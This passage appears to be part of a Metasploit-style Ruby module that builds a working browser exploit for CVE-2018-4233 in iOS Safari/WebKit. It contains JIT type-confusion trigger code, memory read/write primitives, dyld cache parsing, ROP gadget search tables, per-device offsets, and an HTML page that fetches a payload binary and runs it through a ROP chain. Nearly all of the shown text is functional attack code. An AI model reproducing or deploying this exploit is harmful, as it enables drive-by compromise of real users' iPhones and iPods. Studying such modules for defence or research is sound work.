victim_read();\n var res = f2i(unboxed[0]);\n reset_victim_addr();\n return new Int64(res);\n },\n read: function(addr, length) {\n var address = new Int64(addr);\n var a = new Array(length);\n var i;\n\n for (i = 0; i + 8 < length; i += 8) {\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = 0; j < 8; j++) {\n a[i+j] = v[j];\n }\n }\n\n v = this.readInt64(Add(address, i)).bytes()\n for (var j = i; j < length; j++) {\n a[j] = v[j - i];\n }\n\n return a\n },\n test: function() {\n this.write64(boxed_addr + 0x10, 0xfff) // Overwrite index mask, no biggie\n if (0xfff != this.read64(boxed_addr + 0x10)) {\n fail(2)\n }\n },\n }\n // Test read/write\n stage2.test()\n return stage2;\n}\n^\n\n get_mem_rw = (version >= Gem::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\n dump_offsets = ''\n if datastore['DUMP_OFFSETS']\n dump_offsets = %Q^\n var offsetstr = uuid + \" : { \";\n var offsetarray = [ \"_dlsym\", \"_dlopen\", \"__longjmp\", \"regloader\", \"dispatch\", \"stackloader\", \"movx4\", \"ldrx8\", \"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\", \"__platform_memmove\",\n \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\", \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\", \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\", ];\n for (var i = 0; i < offsetarray.length; i++) {\n var offset = offsets[offsetarray[i]];\n if (offset) {\n var offsethex = Sub(offset, cache_slide).toString().replace(\"0x0000000\", \"0x\");\n offsetstr += \"\\\\\"\" + offsetarray[i] + \"\\\\\" : \" + offsethex + \", \";\n }\n }\n offsetstr += \"}, \";\n prompt(\"offsets: \", offsetstr);\n^\n end\n\n html = %Q^\n<html>\n<body>\n<script>\n\n#{utils}\n#{int64}\n\nprint = alert;\nITERS = 1E4;\nALLOCS = 1E3;\n\nvar conversion_buffer = new ArrayBuffer(8);\nvar f64 = new Float64Array(conversion_buffer);\nvar i32 = new Uint32Array(conversion_buffer);\nvar BASE32 = 0x100000000;\n\nfunction f2i(f) {\n f64[0] = f;\n return i32[0] + BASE32 * i32[1];\n}\n\nfunction i2f(i) {\n i32[0] = i % BASE32;\n i32[1] = i / BASE32;\n return f64[0];\n}\n\nfunction hexit(x) {\n if (x instanceof Int64) return x.toString();\n if (x < 0) return \"-\" + hex(-x);\n return \"0x\" + x.toString(16);\n}\n\nfunction fail(x) {\n print('FAIL ' + x);\n location.reload();\n throw null;\n}\n\ncounter = 0;\n\n// CVE-2018-4233\nfunction trigger(constr, modify, res, val) {\n return eval(`\n var o = [13.37]\n var Constructor${counter} = function(o) { ${constr} }\n var hack = false\n var Wrapper = new Proxy(Constructor${counter}, {\n get: function() {\n if (hack) {\n ${modify}\n }\n }\n })\n for (var i = 0; i < ITERS; ++i)\n new Wrapper(o)\n hack = true\n var bar = new Wrapper(o)\n ${res}\n `)\n}\n\nvar workbuf = new ArrayBuffer(0x1000000);\nvar payload = new Uint8Array(workbuf);\n\nfunction pwn() {\n var stage1 = {\n addrof: function(victim) {\n return f2i(trigger(\"this.result = o[0]\", \"o[0] = val\", \"bar.result\", victim))\n },\n fakeobj: function(addr) {\n return trigger(\"o[0] = val\", \"o[0] = {}\", \"o[0]\", i2f(addr))\n },\n test: function() {\n var addr = this.addrof({\n a: 4919\n });\n var x = this.fakeobj(addr);\n if (x.a != 4919) fail(\"stage1\")\n }\n };\n stage1.test();\n\n var stage2 = get_mem_rw(stage1);\n var FPO = #{ios_11 ? \"(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;\" : \"0x18;\"}\n var memory = stage2;\n memory.u32 = _u32;\n\n var wrapper = document.createElement(\"div\");\n var wrapper_addr = stage1.addrof(wrapper);\n var el_addr = memory.readInt64(wrapper_addr + FPO);\n var vtab = memory.readInt64(el_addr);\n\n var anchor = memory.readInt64(vtab);\n var hdr = Sub(anchor, anchor.lo() & 0xfff);\n var b = [];\n while(true)\n {\n if (memory.readInt64(hdr).lo() == 4277009104) {\n fail('WebCore ' + hdr + ' post spectre support coming soon');\n }\n if(strcmp(memory.read(hdr, 0x10), \"dyld_v1 arm64\"))\n {\n break;\n }\n hdr = Sub(hdr, 0x1000);\n }\n\n var base_seg = null;\n var nsegs = memory.u32(Add(hdr, 0x14));\n var segdata = memory.read(Add(hdr, memory.u32(Add(hdr, 0x10))), nsegs * 0x20);\n var segs = [];\n for(var i = 0; i < nsegs; ++i)\n {\n var off = i * 0x20;\n var seg =\n {\n addr: new Int64(segdata.slice(off + 0x0, off + 0x8)),\n size: new Int64(segdata.slice(off + 0x8, off + 0x10)),\n fileoff: new Int64(segdata.slice(off + 0x10, off + 0x18)),\n maxprot: b2u32(segdata.slice(off + 0x18, off + 0x1c)),\n initprot: b2u32(segdata.slice(off + 0x1c, off + 0x20))\n };\n segs.push(seg);\n if(seg.fileoff.hi() == 0 && seg.fileoff.lo() == 0 && (seg.size.hi() != 0 || seg.size.lo() != 0))\n {\n base_seg = seg;\n }\n }\n if(base_seg == null)\n {\n fail(\"base_seg\");\n }\n\n var cache_slide = Sub(hdr, base_seg.addr);\n var uuid = memory.readInt64(Add(hdr, 0x58)).lo();\n var offset_cache = {\n // iPod Touch 10.1.1\n 788795426 : { \"_dlsym\" : 0x18052ddd8, \"_dlopen\" : 0x18052dd10, \"__longjmp\" : 0x1806ffb78, \"regloader\" : 0x180f0622c, \"dispatch\" : 0x180d7e058, \"stackloader\" : 0x18099a8e8, \"_mach_task_self_\" : 0x1a586e3bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806240a4, \"__platform_memmove\" : 0x1806ffe00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a457c438, },\n\n // iPhone 5S 10.2.1\n 3432281541 : { \"_dlsym\" : 0x18052edd8, \"_dlopen\" : 0x18052ed10, \"__longjmp\" : 0x180700b78, \"regloader\" : 0x180f07230, \"dispatch\" : 0x180d7f05c, \"stackloader\" : 0x18099b8ec, \"mach_task_self\" : 0x1a6da23bc,\n \"__kernelrpc_mach_vm_protect_trap\" : 0x1806250c0, \"__platform_memmove\" : 0x180700e00, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1a5a0d438, },\n\n // iPhone 6S 11.0.3\n 425478416 : { \"_dlsym\" : 0x180587574, \"_dlopen\" : 0x180587460, \"__longjmp\" : 0x1807bd7dc, \"regloader\" : 0x180051ad8, \"dispatch\" : 0x19b323a4c, \"stackloader\" : 0x19b2e6f40, \"movx4\" : 0x19b33305c,\n \"ldrx8\" : 0x180060028, \"__ZN3JSC30endOfFixedExecutableMemoryPoolE\" : 0x1b15d8a00, \"__ZN3JSC29jitWriteSeparateHeapsFunctionE\" : 0x1b15d8a08, \"__ZN3JSC32startOfFixedExecutableMemoryPoolE\" : 0x1b15d89f8, },\n };\n\n var offsets = offset_cache[uuid];\n if (offsets)\n {\n var k = Object.keys(offsets);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n offsets[s] = Add(offsets[s], cache_slide);\n }\n }\n else\n {\n var syms = {};\n var gadgets = {};\n\n for(var i = 0; i < segs.length; ++i)\n {\n segs[i].addr = Add(segs[i].addr, cache_slide);\n }\n var libs =\n {\n \"/usr/lib/system/libdyld.dylib\": [\"_dlsym\", \"_dlopen\"],\n #{ ios_11 ? '\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"],\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\"],\n ' : '\n \"/usr/lib/system/libsystem_platform.dylib\": [\"__longjmp\", \"__platform_memmove\"],\n \"/usr/lib/system/libsystem_kernel.dylib\": [\"_mach_task_self_\", \"__kernelrpc_mach_vm_protect_trap\"],\n \"/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore\": [\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"],\n '}\n }\n\n #{ ios_11 ? '\n var opcodes = {\n // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret\n \"ldrx8\": [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n \"dispatch\": [ [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ] ],\n // mov x3, x22 ; mov x6, x27 ; mov x0, x24 ; mov x1, x19 ; mov x2, x23 ; ldr x4, [sp] ; blr x8\n \"regloader\": [ [ 0xaa1603e3, 0xaa1b03e6, 0xaa1803e0, 0xaa1303e1, 0xaa1703e2, 0xf94003e4, 0xd63f0100 ] ],\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n \"stackloader\": [ [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ] ],\n // mov x4, x20 ; blr x8\n \"movx4\": [ [ 0xaa1403e4, 0xd63f0100 ] ],\n }\n var opcode_libs = [\n \"/usr/lib/PN548.dylib\", // dispatch, stackloader\n \"/usr/lib/libc++.1.dylib\", // ldrx8, regloader, movx4, stackloader\n ];\n\n ' : '\n var opcodes = {\n // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28\n \"regloader\": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],\n \"dispatch\": [\n // blr x21; ldp x29, x30, [sp, 0x30]; ldp x20, x19, [sp, 0x20]; ldp x22, x21, [sp, 0x10]; add sp, sp, 0x40; ret\n [ 0xd63f02a0, 0xa9437bfd, 0xa9424ff4, 0xa94157f6, 0x910103ff, 0xd65f03c0 ],\n // blr x21; sub sp, x29, 0x20; ldp x29, x30, [sp, 0x20]; ldp x20, x19, [sp, 0x10]; ldp x22, x21, [sp], 0x30; ret\n [ 0xd63f02a0, 0xd10083bf, 0xa9427bfd, 0xa9414ff4, 0xa8c357f6, 0xd65f03c0 ],\n ],\n \"stackloader\": [\n // ldp x29, x30, [sp, 0x60]; ldp x20, x19, [sp, 0x50]; ldp x22, x21, [sp, 0x40]; ldp x24, x23, [sp, 0x30];\n // ldp x26, x25, [sp, 0x20]; ldp x28, x27, [sp, 0x10]; add sp, sp, 0x70; ret\n [ 0xa9467bfd, 0xa9454ff4, 0xa94457f6, 0xa9435ff8, 0xa94267fa, 0xa9416ffc, 0x9101c3ff, 0xd65f03c0 ],\n // sub sp, x29, 0x50; ldp x29, x30, [sp, 0x50]; ldp x20, x19, [sp, 0x40]; ldp x22, x21, [sp, 0x30];\n // ldp x24, x23, [sp, 0x20]; ldp x26, x25, [sp, 0x10]; ldp x28, x27, [sp], 0x60; ret\n [ 0xd10143bf, 0xa9457bfd, 0xa9444ff4, 0xa94357f6, 0xa9425ff8, 0xa94167fa, 0xa8c66ffc, 0xd65f03c0 ],\n ],\n };\n\n var opcode_libs = [ \"/usr/lib/libLLVM.dylib\" ];\n '}\n\n var imgs = Add(hdr, memory.u32(Add(hdr, 0x18)));\n var nimgs = memory.u32(Add(hdr, 0x1c));\n for(var i = 0; i < nimgs; ++i)\n {\n var straddr = off2addr(segs, memory.u32(Add(imgs, i * 0x20 + 0x18)));\n var fn = function(i)\n {\n return memory.read(Add(straddr, i), 1)[0];\n };\n var base = Add(memory.readInt64(Add(imgs, i * 0x20)), cache_slide);\n if(opcode_libs.some(lib => strcmp(fn, lib)))\n {\n var ncmds = memory.u32(Add(base, 0x10));\n for(var j = 0, off = 0x20; j < ncmds; ++j)\n {\n var cmd = memory.u32(Add(base, off));\n if(cmd == 0x19 && strcmp(memory.read(Add(base, off + 0x8), 0x10), \"__TEXT\")) // LC_SEGMENT_64\n {\n var nsects = memory.u32(Add(base, off + 0x40));\n for(var k = 0, o = off + 0x48; k < nsects; ++k)\n {\n if(strcmp(memory.read(Add(base, o), 0x10), \"__text\"))\n {\n var keys = Object.keys(opcodes).filter(k=>!gadgets.hasOwnProperty[k])\n if (keys.length == 0) break;\n\n var addr = Add(memory.readInt64(Add(base, o + 0x20)), cache_slide)\n var size = memory.u32(Add(base, o + 0x28))\n\n // Copy the entire __text region into a Uint32Array for faster processing.\n // Previously you could map a Uint32Array over the data, but on i7+ devices\n // this caused access violations.\n // Instead we read the entire region and copy it into a Uint32Array. The\n // memory.read primitive has a weird limitation where it's only able to read\n // up to 4096 bytes. to get around this we'll read multiple times and combine\n // them into one.\n\n var allData = new Uint32Array(size / 4)\n for (var r = 0; r < size; r += 4096) {\n // Check to ensure we don't read out of the region we want\n var qty = 4096\n if (size - r < qty) {\n qty = size - r\n }\n var data = memory.read(Add(addr, r), qty)\n\n // Data is an array of single bytes. This code takes four entries\n // and converts them into a single 32-bit integer. It then adds it\n // into the `allData` array at the given index\n for (var h = 0; h < qty; h += 4) {\n var fourBytes = b2u32(data.slice(h, h + 4))\n allData[(r + h) / 4] = fourBytes\n }\n }\n\n // Loop through the entire data map looking for each gadget we need\n for (var f = 0; f < size && keys.length > 0; f++) {\n\n // Check every gadget\n for (var z = 0; z < keys.length; z++) {\n var key = keys[z];\n var opcode_list = opcodes[key];\n for (var y = 0; y < opcode_list.length; y++) {\n var opcode = opcode_list[y];\n for (var t = 0; t < opcode.length; t++) {\n var op = allData[f+t];\n if (op == opcode[t]) {\n if (t == opcode.length - 1) {\n gadgets[key] = Add(addr, f*4);\n keys.splice(z, 1);\n z = keys.length;\n break;\n }\n continue;\n }\n break;\n }\n }\n }\n }\n\n break;\n }\n o += 0x50;\n }\n break;\n }\n off += memory.u32(Add(base, off + 0x4));\n }\n continue;\n }\n var lookup = null;\n for(var k = Object.keys(libs), j = 0; j < k.length; ++j)\n {\n if(strcmp(fn, k[j]))\n {\n lookup = libs[k[j]];\n break;\n }\n }\n if(lookup != null)\n {\n fsyms(memory, base, segs, lookup, syms);\n }\n }\n\n var vals = Object.keys(libs).map(function(key) {\n return libs[key];\n });\n var k = vals.reduce(function(p,c){ c.forEach(function(e){ p.push(e) });return p; }, []);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(syms[s] == null)\n {\n fail(s);\n }\n syms[s] = Add(syms[s], cache_slide);\n }\n k = Object.keys(opcodes);\n for(var i = 0; i < k.length; ++i)\n {\n var s = k[i];\n if(gadgets[s] == null)\n {\n fail(s);\n }\n }\n\n offsets = {}\n offsets[\"regloader\"] = gadgets[\"regloader\"];\n offsets[\"dispatch\"] = gadgets[\"dispatch\"];\n offsets[\"stackloader\"] = gadgets[\"stackloader\"];\n offsets[\"ldrx8\"] = gadgets[\"ldrx8\"];\n offsets[\"movx4\"] = gadgets[\"movx4\"];\n offsets[\"__longjmp\"] = syms[\"__longjmp\"];\n offsets[\"__kernelrpc_mach_vm_protect_trap\"] = syms[\"__kernelrpc_mach_vm_protect_trap\"];\n offsets[\"__platform_memmove\"] = syms[\"__platform_memmove\"];\n offsets[\"_dlopen\"] = syms[\"_dlopen\"];\n offsets[\"_dlsym\"] = syms[\"_dlsym\"];\n offsets[\"_mach_task_self_\"] = syms[\"_mach_task_self_\"];\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = syms[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] = syms[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"];\n\n if (offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"] != null) {\n offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"], 8);\n }\n #{ ios_11 ? '\n if (offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] == null && offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"] != null) {\n offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"] = Sub(offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"], 8);\n }' : ''}\n\n#{dump_offsets}\n\n }\n\n\n var regloader = offsets[\"regloader\"];\n var dispatch = offsets[\"dispatch\"];\n var stackloader = offsets[\"stackloader\"];\n var longjmp = offsets[\"__longjmp\"];\n var mach_vm_protect = offsets[\"__kernelrpc_mach_vm_protect_trap\"];\n var memmove = offsets[\"__platform_memmove\"];\n var dlopen = offsets[\"_dlopen\"];\n var dlsym = offsets[\"_dlsym\"];\n var task_self = offsets[\"_mach_task_self_\"]\n var endOfFixedMem = offsets[\"__ZN3JSC30endOfFixedExecutableMemoryPoolE\"];\n var startOfFixedMem = offsets[\"__ZN3JSC32startOfFixedExecutableMemoryPoolE\"];\n\n var ldrx8 = offsets[\"ldrx8\"]; // might be null\n var movx4 = offsets[\"movx4\"]; // might be null\n\n var mach_task_self_ = new Int64(memory.readInt64(task_self).lo());\n var memPoolEnd = memory.readInt64(endOfFixedMem);\n\n var memPoolStart = Int64.Zero;\n if (startOfFixedMem) {\n memPoolStart = memory.readInt64(startOfFixedMem);\n }\n\n var jitWriteSeparateHeaps = Int64.Zero;\n if (offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]) {\n jitWriteSeparateHeaps = memory.readInt64(offsets[\"__ZN3JSC29jitWriteSeparateHeapsFunctionE\"]);\n }\n\n var shsz = new Int64(\"0x100000\");\n var paddr = memory.readInt64(Add(stage1.addrof(payload), 0x10));\n var codeAddr = Sub(memPoolEnd, shsz);\n codeAddr = Sub(codeAddr, codeAddr.lo() & 0x3fff);\n\n memory.writeInt64(Add(vtab, 0x18), longjmp);\n memory.writeInt64(Add(el_addr, 0x58), stackloader); // x30 (gadget)\n\n var arrsz = 0x100000,\n off = 0x1000;\n var arr = new Uint32Array(arrsz);\n var stack = memory.readInt64(Add(stage1.addrof(arr), 0x10));\n\n var pos = arrsz - off;\n\n var add_call_llvm = function(func, x0, x1, x2, x3, x4, jump_to) {\n x4 = x4 || Int64.Zero\n\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = dispatch.lo(); // x28 (gadget for regloader)\n arr[pos++] = dispatch.hi(); // x28 (gadget for regloader)\n arr[pos++] = 0xdead0014; // x27 (unused)\n arr[pos++] = 0xdead0015; // x27 (unused)\n arr[pos++] = x4.lo(); // x26 == x4 (arg5)\n arr[pos++] = x4.hi(); // x26 == x4 (arg5)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x2.lo(); // x24 == x2 (arg3)\n arr[pos++] = x2.hi(); // x24 == x2 (arg3)\n arr[pos++] = x0.lo(); // x23 == x0 (arg1)\n arr[pos++] = x0.hi(); // x23 == x0 (arg1)\n arr[pos++] = x1.lo(); // x22 == x1 (arg2)\n arr[pos++] = x1.hi(); // x22 == x1 (arg2)\n arr[pos++] = func.lo(); // x21 (func)\n arr[pos++] = func.hi(); // x21 (func)\n arr[pos++] = 0xdbad0018; // x20 (unused)\n arr[pos++] = 0xdbad0019; // x20 (unused)\n arr[pos++] = 0xdead001a; // x19 (unused)\n arr[pos++] = 0xdead001b; // x19 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x40).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x40).hi(); // x29\n arr[pos++] = regloader.lo(); // x30 (first gadget)\n arr[pos++] = regloader.hi(); // x30 (first gadget)\n\n // after dispatch:\n arr[pos++] = 0xdead0020; // unused\n arr[pos++] = 0xdead0021; // unused\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4 + 0x70).lo(); // x29\n arr[pos++] = Add(stack, tmppos*4 + 0x70).hi(); // x29\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call_via_x8 = function(func, x0, x1, x2, x3, x4, jump_to) {\n //alert(`add_call_via_x8: ${func}(${x0}, ${x1}, ${x2}, ${x3}, ${x4}, ${jump_to})`);\n //x4 = x4 || Int64.One\n // in stackloader:\n arr[pos++] = 0xdead0010; // unused\n arr[pos++] = 0xdead0011; // unused\n arr[pos++] = 0xdead0012; // unused\n arr[pos++] = 0xdead0013; // unused\n arr[pos++] = 0xdead1101; // x28 (unused)\n arr[pos++] = 0xdead1102; // x28 (unused)\n arr[pos++] = 0xdead0014; // x27 == x6 (unused)\n arr[pos++] = 0xdead0015; // x27 == x6 (unused)\n arr[pos++] = 0xdead0016; // x26 (unused)\n arr[pos++] = 0xdead0017; // x26 (unused)\n arr[pos++] = x3.lo(); // x25 == x3 (arg4)\n arr[pos++] = x3.hi(); // x25 == x3 (arg4)\n arr[pos++] = x0.lo(); // x24 == x0 (arg1)\n arr[pos++] = x0.hi(); // x24 == x0 (arg1)\n arr[pos++] = x2.lo(); // x23 == x2 (arg3)\n arr[pos++] = x2.hi(); // x23 == x2 (arg3)\n arr[pos++] = x3.lo(); // x22 == x3 (arg4)\n arr[pos++] = x3.hi(); // x22 == x3 (arg4)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdead0018; // x20 (unused)\n arr[pos++] = 0xdead0019; // x20 (unused)\n var tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdead001c; // x29 (unused)\n arr[pos++] = 0xdead001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n if (x4) {\n arr[pos++] = stackloader.lo();\n arr[pos++] = stackloader.hi();\n } else {\n arr[pos++] = dispatch.lo(); // x8 (target for regloader)\n arr[pos++] = dispatch.hi(); // x8 (target for regloader)\n }\n arr[pos++] = 0xdead1401; // (unused)\n arr[pos++] = 0xdead1402; // (unused)\n arr[pos++] = 0xdead1301; // x20 (unused)\n arr[pos++] = 0xdead1302; // x20 (unused)\n arr[pos++] = x1.lo(); // x19 == x1 (arg2)\n arr[pos++] = x1.hi(); // x19 == x1 (arg2)\n arr[pos++] = 0xdead1201; // x29 (unused)\n arr[pos++] = 0xdead1202; // x29 (unused)\n arr[pos++] = regloader.lo(); // x30 (next gadget)\n arr[pos++] = regloader.hi(); // x30 (next gadget)\n\n // in regloader\n // NOTE: REGLOADER DOES NOT ADJUST SP!\n // sometimes i didn't get expected value in x4\n // and i have no fucking idea why\n // usleep likely did the trick, but I would still keep the code\n // with movx4\n //arr[pos++] = x4.lo() // x4 (should be -- but see lines above)\n //arr[pos++] = x4.hi() // x4 (should be -- but see lines above)\n\n if (x4) {\n // in stackloader:\n arr[pos++] = 0xdaad0010; // unused\n arr[pos++] = 0xdaad0011; // unused\n arr[pos++] = 0xdaad0012; // unused\n arr[pos++] = 0xdaad0013; // unused\n arr[pos++] = 0xdaad1101; // x28 (unused)\n arr[pos++] = 0xdaad1102; // x28 (unused)\n arr[pos++] = 0xdaad0014; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0015; // x27 == x6 (unused)\n arr[pos++] = 0xdaad0016; // x26 (unused)\n arr[pos++] = 0xdaad0017; // x26 (unused)\n arr[pos++] = 0xdaad0018; // x25 (unused)\n arr[pos++] = 0xdaad0019; // x25 (unused)\n arr[pos++] = 0xdaad00f0; // x24 (unused)\n arr[pos++] = 0xdaad00f1; // x24 (unused)\n arr[pos++] = 0xdaad00f2; // x23 (unused)\n arr[pos++] = 0xdaad00f3; // x23 (unused)\n arr[pos++] = 0xdaad00f4; // x22 (unused)\n arr[pos++] = 0xdaad00f5; // x22 (unused)\n arr[pos++] = func.lo(); // x21 (target for dispatch)\n arr[pos++] = func.hi(); // x21 (target for dispatch)\n arr[pos++] = 0xdaad0018; // x20 (unused)\n arr[pos++] = 0xdaad0019; // x20 (unused)\n tmppos = pos;\n arr[pos++] = Add(stack, tmppos*4).lo(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = Add(stack, tmppos*4).hi(); // x19 (scratch address for str x8, [x19])\n arr[pos++] = 0xdaad001c; // x29 (unused)\n arr[pos++] = 0xdaad001d; // x29 (unused)\n arr[pos++] = ldrx8.lo(); // x30 (next gadget)\n arr[pos++] = ldrx8.hi(); // x30 (next gadget)\n\n // in ldrx8\n arr[pos++] = dispatch.lo(); // x8 (target for movx4)\n arr[pos++] = dispatch.hi(); // x8 (target for movx4)\n arr[pos++] = 0xdaad1401; // (unused)\n arr[pos++] = 0xdaad1402; // (unused)\n arr[pos++] = x4.lo(); // x20 == x4 (arg5)\n arr[pos++] = x4.hi(); // x20 == x4 (arg5)\n arr[pos++] = 0xdaad1301; // x19 (unused)\n arr[pos++] = 0xdaad1302; // x19 (unused)\n arr[pos++] = 0xdaad1201; // x29 (unused)\n arr[pos++] = 0xdaad1202; // x29 (unused)\n arr[pos++] = movx4.lo(); // x30 (next gadget)\n arr[pos++] = movx4.hi(); // x30 (next gadget)\n }\n\n // after dispatch:\n\n // keep only one: these or 0xdeaded01\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n\n arr[pos++] = 0xdead0022; // unused\n arr[pos++] = 0xdead0023; // unused\n arr[pos++] = 0xdead0024; // x22 (unused)\n arr[pos++] = 0xdead0025; // x22 (unused)\n arr[pos++] = 0xdead0026; // x21 (unused)\n arr[pos++] = 0xdead0027; // x21 (unused)\n arr[pos++] = 0xdead0028; // x20 (unused)\n arr[pos++] = 0xdead0029; // x20 (unused)\n arr[pos++] = 0xdead002a; // x19 (unused)\n arr[pos++] = 0xdead002b; // x19 (unused)\n arr[pos++] = 0xdead002c; // x29 (unused)\n arr[pos++] = 0xdead002d; // x29 (unused)\n arr[pos++] = jump_to.lo(); // x30 (gadget)\n arr[pos++] = jump_to.hi(); // x30 (gadget)\n }\n\n var add_call = function(func, x0, x1, x2, x3, x4, jump_to) {\n x0 = x0 || Int64.Zero\n x1 = x1 || Int64.Zero\n x2 = x2 || Int64.Zero\n x3 = x3 || Int64.Zero\n jump_to = jump_to || stackloader\n\n return (ldrx8 ? add_call_via_x8 : add_call_llvm)(\n func, x0, x1, x2, x3, x4, jump_to\n )\n }\n\n #{ios_11 ? '\n if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {\n add_call(jitWriteSeparateHeaps\n , Sub(codeAddr, memPoolStart) // off\n , paddr // src\n , shsz // size\n );\n } else {\n fail(\"jitWrite\");\n }\n ' : '\n add_call(mach_vm_protect,\n mach_task_self_, // task\n codeAddr, // addr\n shsz, // size\n new Int64(0), // set maximum\n new Int64(7) // prot (RWX)\n );\n\n add_call(memmove,\n codeAddr, // dst\n paddr, // src\n shsz // size\n );\n '}\n\n add_call(codeAddr,\n dlopen,\n dlsym,\n jitWriteSeparateHeaps,\n memPoolStart,\n memPoolEnd,\n );\n\n for(var i = 0; i < 0x20; ++i)\n {\n arr[pos++] = 0xde00c0de + (i<<16);\n }\n\n var sp = Add(stack, (arrsz - off) * 4);\n memory.writeInt64(Add(el_addr, 0x60), Add(sp, 0x60)); // x29\n memory.writeInt64(Add(el_addr, 0x68), sp); // x2 (copied into sp)\n\n // trigger\n //print(\"u rdy?\")\n wrapper.addEventListener(\"click\", function(){});\n\n}\n\n#{get_mem_rw}\n\nfunction go() {\n try {\n var req = new XMLHttpRequest;\n req.open(\"GET\", \"exploit\");\n req.responseType = \"arraybuffer\";\n req.addEventListener(\"load\", function() {\n try {\n if (req.responseType != \"arraybuffer\") throw \"y u no blob\";\n payload.set(new Uint8Array(req.response), 0x0);\n pwn();\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n });\n req.addEventListener(\"error\", function(ev) {\n fail(ev)\n });\n req.send()\n } catch (e) {\n fail(\"Error: \" + e + (e != null ? \" \" + e.stack : \"\"))\n }\n};\n\ngo();\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/\\/\\/.*$/, '') # strip comments\n 